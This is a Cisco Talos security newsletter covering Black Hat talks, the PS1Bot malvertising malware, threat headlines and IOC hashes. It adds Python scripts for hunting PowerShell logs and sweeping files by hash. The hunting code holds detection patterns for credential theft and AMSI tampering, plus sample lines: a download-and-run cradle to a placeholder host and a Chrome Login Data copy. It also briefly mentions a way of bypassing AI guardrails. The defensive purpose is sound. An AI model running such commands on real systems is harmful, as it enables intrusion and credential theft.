
# What happened in Vegas (that you actually want to know about)


![What happened in Vegas \(that you actually want to know about\)](https://blog.talosintelligence.com/content/images/2025/08/threat-source-newsletter-1.jpg)

Welcome to this week's edition of the Threat Source newsletter.

Last week I flew 5,000 miles to Las Vegas for Black Hat USA. After navigating the casino carpet labyrinth and finding the only venue in Nevada that serves a proper English breakfast tea with milk (lifesaver), I've decided Black Hat feels exactly like trying to run in a dream -- you're always heading somewhere, never quickly, and the water costs $8.

I don't mean to complain (although, as a Brit, I'm practically obligated to file a formal grievance about the weather, tea or queue length). In truth, it was a brilliant week, and I got to watch my fellow Talosians deliver some outstanding presentations and research.

Rather than recap everything we did (our _YouTube channel_ will have plenty of research highlights soon), here are three standouts:

* **Joe Marshall's live incident-response exercise** - Joe ran _Backdoors & Breaches_, an interactive card game originally developed with NetHope and NGO-ISAC for humanitarian non-governmental organizations. At Black Hat, he adapted it for a lunch-and-learn with over 60 participants, guiding them through a simulated cybersecurity crisis. If you're curious, you can _find the cards online here_. With a screen-sharing tool, you can stream it to an audience of any size and have people play along virtually. You can also read more about Joe's experience developing the game, alongside a video walkthrough, in his _new blog post_.
* **Amy Chang's AI guardrail bypass research** - Amy's booth talk revealed a novel way to break the guardrails of generative AI by tricking it into repeating human-written content verbatim, a technique called "_decomposition_." Her work drew attention from media outlets including _TechRepublic_, _SecurityWeek_ and _WebProNews_.
* **Philippe Laulheret's _ReVault_ presentation** - Philippe, from our Vulnerability Research and Discovery team, revealed vulnerabilities in embedded security chips affecting millions of laptops, potentially allowing attackers to bypass Windows login or install persistent malware. A few days ago, he published a longer version of his investigation, so you can now _read the full technical deep dive_ covering the research process and exploit breakdown.



We'll have more to share soon, including a behind-the-scenes tour of the Black Hat Network Operations Center (NOC).

## The one big thing

Cisco Talos has identified a _widespread malvertising campaign_ distributing a multi-stage malware framework Talos calls "PS1Bot," which uses PowerShell and C# modules to steal sensitive information, log keystrokes, capture screenshots, and maintain persistent access on infected systems. PS1Bot employs in-memory execution and modular updates, targeting browser credentials, cryptocurrency wallets, and more, while minimizing its footprint to evade detection. The campaign has been active and rapidly evolving throughout 2025.

### Why do I care?

Casual browsing and downloading seemingly safe files can lead to infection, putting your personal data, passwords and financial info at risk -- especially if you use cryptocurrency wallets or save passwords in browsers.

### So now what?

Be extra cautious when downloading files from search results or ads, keep your security software updated, and use dedicated password managers and security tools instead of storing sensitive info in browsers. Stay informed about evolving threats like PS1Bot, as attackers are constantly updating their tactics. Talos' _blog_ also provides Snort SIDs and ClamAV detections.
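The behaviours the write-up attributes to PS1Bot (a PowerShell loader, in-memory execution, C# modules compiled on the fly, browser-credential and wallet theft, keylogging, screenshots) are worth hunting for in PowerShell script-block logs (Windows Event ID 4104) while you wait for the Snort and ClamAV coverage to reach your sensors. The Python below is an added example, not Talos code and not a PS1Bot signature: the regex rules, their weights, the threshold and the four sample script blocks are all constructed for illustration, and 192.0.2.10 is a documentation-range placeholder address. In practice you would feed `hunt()` the `ScriptBlockText` of real 4104 events from your own telemetry.

```python
"""Heuristic hunt over PowerShell script-block logs (Windows Event ID 4104).

Added example for this newsletter, not Talos code and not a PS1Bot
signature. The rules encode the behaviours the write-up attributes to
PS1Bot (PowerShell loader, in-memory execution, on-the-fly C# modules,
browser-credential and wallet theft, keylogging, screenshots) as generic
hunting heuristics; weights, threshold and sample events are constructed.
"""
import re
from dataclasses import dataclass, field

# (rule name, pattern, weight). Patterns are deliberately broad: they are
# meant to surface script blocks for a human to read, not to convict them.
RULES = [
    ("download-cradle", re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I), 3),
    ("in-memory-exec",  re.compile(r"Invoke-Expression|\biex\b", re.I), 3),
    ("reflective-load", re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I), 4),
    ("csharp-compile",  re.compile(r"Add-Type\s+-TypeDefinition", re.I), 3),
    ("encoded-command", re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I), 3),
    ("base64-decode",   re.compile(r"FromBase64String", re.I), 2),
    ("amsi-tamper",     re.compile(r"amsiInitFailed|AmsiScanBuffer", re.I), 5),
    ("browser-creds",   re.compile(r"Login Data|logins\.json|Local State", re.I), 3),
    ("wallet-paths",    re.compile(r"wallet\.dat|Electrum|Exodus|MetaMask", re.I), 3),
    ("keylog-hook",     re.compile(r"GetAsyncKeyState|SetWindowsHookEx", re.I), 4),
    ("screenshot",      re.compile(r"CopyFromScreen", re.I), 2),
]

THRESHOLD = 6  # one cradle or one IEX alone is noise; cradle + IEX is worth a look


@dataclass
class Finding:
    record_id: int
    score: int
    hits: list = field(default_factory=list)


def score_script_block(text):
    """Return (score, [rule names]) for one ScriptBlockText value."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits


def hunt(events, threshold=THRESHOLD):
    """events: iterable of (EventRecordID, ScriptBlockText). Returns Findings at or above threshold."""
    findings = []
    for record_id, text in events:
        score, hits = score_script_block(text)
        if score >= threshold:
            findings.append(Finding(record_id, score, hits))
    return findings


# Constructed sample 4104 script blocks (not real telemetry); 192.0.2.10 is a
# documentation-range address used as a placeholder.
SAMPLE_EVENTS = [
    (101, "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    (102, "$c = New-Object Net.WebClient; IEX ($c.DownloadString('http://192.0.2.10/stage2.ps1'))"),
    (103, "Add-Type -TypeDefinition $src; [System.Reflection.Assembly]::Load([Convert]::FromBase64String($b))"),
    (104, 'Copy-Item "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data" $env:TEMP'),
]


def hunt_samples():
    return hunt(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in hunt_samples():
        print(f"record {f.record_id}: score {f.score} via {', '.join(f.hits)}")
```

Two of the four constructed events clear the threshold (the download cradle piped into `IEX`, and the `Add-Type` plus reflective `Assembly::Load` pair that matches the "C# modules, in memory" description). The Chrome `Login Data` copy scores only 3 on its own, which is the point of the caveat: credential-theft strings are common in legitimate admin scripts, so correlate low-scoring hits across the same process or logon session rather than raising the individual rule weights.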

## Top security headlines of the week

**Russian government hackers said to be behind US federal court filing system hack**
The Russian government is allegedly behind the data breach affecting the U.S. court filing system known as PACER, according to The New York Times. (_TechCrunch_)

**North Korean Kimsuky hackers exposed in alleged data breach**
The North Korean state-sponsored hacking group known as Kimsuky has reportedly suffered a data breach after two hackers stole the group's data and leaked it publicly online. (_Bleeping Computer_)

**Exclusive: Brosix and Chatox promised to keep your chats secured. They didn't.**
A researcher contacted DataBreaches after finding an unsecured backup with 155.3 GB of unique compressed files. The researcher first logged the backup as exposed in late April. (_DataBreaches_)

**Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs**
The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability was exploited to breach "critical organizations" in the country. (_Bleeping Computer_)

**Russian hackers exploited WinRAR zero-day in attacks on Europe, Canada**
A Russian threat group has been observed exploiting a WinRAR zero-day vulnerability (now patched) as part of a cyberespionage campaign aimed at organizations in Europe and Canada. (_SecurityWeek_)

## Can't get enough Talos?

* **_Microsoft Patch Tuesday for August 2025_**
Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as "critical".
* **_ReVault! When your SoC turns against you … deep dive edition_**
Talos reported five vulnerabilities to Broadcom and Dell affecting both the ControlVault3 firmware and its associated Windows APIs, a set we are calling "ReVault." More than 100 Dell laptop models are affected if left unpatched. The ReVault attack can be used as a post-compromise persistence technique that survives even a Windows reinstall.
* **_The TTP: Cyber criminals brought PowerShell 1.0 to a modern ransomware fight_**
Groups like Qilin are using custom encryptors, uncommon RMM tools, and even PowerShell 1.0 (yes, from 2006) to quietly recon networks.
* **_Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst_**
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian).



## Upcoming events where you can find Talos

_BlueTeamCon_ (Sept. 4 - 7) Chicago, IL

_LABScon_ (Sept. 17 - 20) Scottsdale, AZ

_VB2025_ (Sept. 24 - 26) Berlin, Germany

## Most prevalent malware files from Talos telemetry over the past week

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: _https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507_
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

**SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0**
MD5: 8c69830a50fb85d8a794fa46643493b2
VirusTotal: _https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0_
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

**SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08**
MD5: 906282640ae3088481d19561c55025e4
VirusTotal: _https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08_
Typical Filename: AAct_x64.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Winactivator::1201
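If you want to check a file share or a quarantine folder against the three hashes above, the Python below is an added example (not Talos tooling) that hashes every file once and matches on SHA256 first, with MD5 kept only as a secondary key because the page lists it. The three IOC entries are copied from the list above; the temp-directory self-test and its IOC set are constructed for this example. Run it against a real path by calling `sweep("/path/to/scan")`.

```python
"""Hash-match sweep against the prevalent-sample IOCs listed above.

Added example, not Talos tooling. Hashes every file under a directory once
(SHA256 and MD5 from a single read) and reports matches. SHA256 is the
authoritative key; an MD5-only hit is flagged separately for manual review
because MD5 is collision-prone and some feeds carry stale MD5 values.
"""
import hashlib
import os
import tempfile

# Values copied from the page's prevalent-malware list, keyed by SHA256.
TALOS_PREVALENT = {
    "9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507": {
        "md5": "2915b3f8b703eb744fc54c81f4a9c67f",
        "name": "VID001.exe", "detection": "Win.Worm.Coinminer::1201"},
    "c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0": {
        "md5": "8c69830a50fb85d8a794fa46643493b2",
        "name": "AAct.exe", "detection": "PUA.Win.Dropper.Generic::1201"},
    "83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08": {
        "md5": "906282640ae3088481d19561c55025e4",
        "name": "AAct_x64.exe", "detection": "PUA.Win.Tool.Winactivator::1201"},
}


def hash_file(path, chunk=1 << 20):
    """Stream the file once and return (sha256, md5) hex digests."""
    sha, md5 = hashlib.sha256(), hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            sha.update(block)
            md5.update(block)
    return sha.hexdigest(), md5.hexdigest()


def sweep(root, iocs=TALOS_PREVALENT):
    """Walk root; return a list of match dicts, strongest evidence first."""
    md5_index = {v["md5"].lower(): k for k, v in iocs.items()}
    matches = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                sha, md5 = hash_file(path)
            except OSError:
                continue  # unreadable or transient file: skip it, don't abort the sweep
            if sha in iocs:
                matches.append({"path": path, "sha256": sha, "match": "sha256", **iocs[sha]})
            elif md5 in md5_index:
                # SHA256 differs but MD5 agrees: stale feed entry or collision; review by hand.
                matches.append({"path": path, "sha256": sha, "match": "md5-only", **iocs[md5_index[md5]]})
    matches.sort(key=lambda m: (m["match"] != "sha256", m["path"]))
    return matches


def demo():
    """Constructed self-test: a temp dir with three files and a constructed IOC set."""
    constructed = {
        hashlib.sha256(b"hello").hexdigest(): {
            "md5": hashlib.md5(b"hello").hexdigest(), "name": "hello.txt", "detection": "Constructed.Test"},
        # Deliberately wrong SHA256 with a correct MD5, to exercise the md5-only path.
        "0" * 64: {
            "md5": hashlib.md5(b"other").hexdigest(), "name": "other.txt", "detection": "Constructed.StaleEntry"},
    }
    with tempfile.TemporaryDirectory() as tmp:
        for fname, data in (("hello.txt", b"hello"), ("other.txt", b"other"), ("clean.txt", b"clean")):
            with open(os.path.join(tmp, fname), "wb") as fh:
                fh.write(data)
        return [(os.path.basename(m["path"]), m["match"]) for m in sweep(tmp, constructed)]


if __name__ == "__main__":
    for m in sweep("."):
        print(f'{m["match"]:9} {m["path"]} -> {m["detection"]} ({m["name"]})')
```

Treat an `md5-only` result as a lead rather than a confirmed hit, and remember that a hash sweep only catches the exact binaries Talos saw; the ClamAV and Snort detections referenced earlier in the newsletter are what cover repacked variants.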


ID TALOSBLOG:2E5750634BF4A53879ACA24A74E002C6
Published Aug 14, 2025 at 18:00
